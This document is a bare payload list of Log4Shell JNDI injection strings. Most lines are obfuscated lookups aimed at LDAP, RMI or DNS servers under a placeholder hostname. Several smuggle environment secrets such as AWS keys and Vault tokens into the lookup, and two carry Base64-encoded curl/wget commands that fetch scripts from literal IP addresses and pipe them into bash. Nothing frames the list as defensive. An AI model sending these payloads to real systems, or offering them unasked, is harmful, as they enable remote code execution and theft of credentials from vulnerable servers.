${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname/poc}
${${::-j}ndi:rmi://hostname/poc}
${jndi:rmi://hostname}
${${lower:jndi}:${lower:rmi}://hostname/poc}
${${lower:${lower:jndi}}:${lower:rmi}://hostname/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname/poc}
${jndi:ldap://hostname:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname/poc}
${${::-j}ndi:rmi://hostname/poc}
${jndi:rmi://hostname/poc}
${${lower:jndi}:${lower:rmi}://hostname/poc}
${${lower:${lower:jndi}}:${lower:rmi}://hostname/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname/poc}
${${upper:jndi}:${upper:rmi}://hostname/poc}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://hostname/poc}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://hostname/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.hostname/poc}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostname}.hostname/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.hostname/poc}
${jndi:dns://aeutbj.hostname/poc/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://hostname/poc/
${jndi:ldap://hostname:1389/i_rock}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//hostname/poc}
/$%7Bjndi:ldap://hostname:1389/Exploit%7D
/$%7Bjndi:ldap://x-ios-validation.com.hostname%7D
jn${env::-}di:
jn${date:}di${date:':'}
j${k8s:k5:-ND}i${sd:k5:-:}
j${main:\k5:-Nd}i${spring:k5:-:}
j${sys:k5:-nD}${lower:i${web:k5:-:}}
j${::-nD}i${::-:}
j${EnV:K5:-nD}i:
j${loWer:Nd}i${uPper::}
${jndi:ldap://${sys:java.version}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.hostname/poc}
${jndi:ldap://${env:VAULT_TOKEN}.hostname/poc}
${jndi:rmi://${env:VAULT_TOKEN}.hostname/poc}
${jndi:ldap://${env:AWS_GOVCLOUD_ACCESS_KEY}.hostname/1}
${jndi:ldap://${sys:java.version}.hostname}
${jndi:ldap://${hostname}.§§.${sys:java.version}.hostname}
${jndi:ldap://${env:JAVA_VERSION}.hostname}
${jndi:ldap://hostname:1389/${java:version}}
/$%7bjndi:ldap:/$%7blower:/%7dhostname:1389/o=tomcat%7d$%7blower:/%7d/
${jndi:ldap://hostname:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
${jndi:ldap://hostname:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname/poc}
${${::-j}ndi:rmi://hostname/poc}
${jndi:rmi://hostname/poc}
${${lower:jndi}:${lower:rmi}://hostname/poc}
${${lower:${lower:jndi}}:${lower:rmi}://hostname/poc}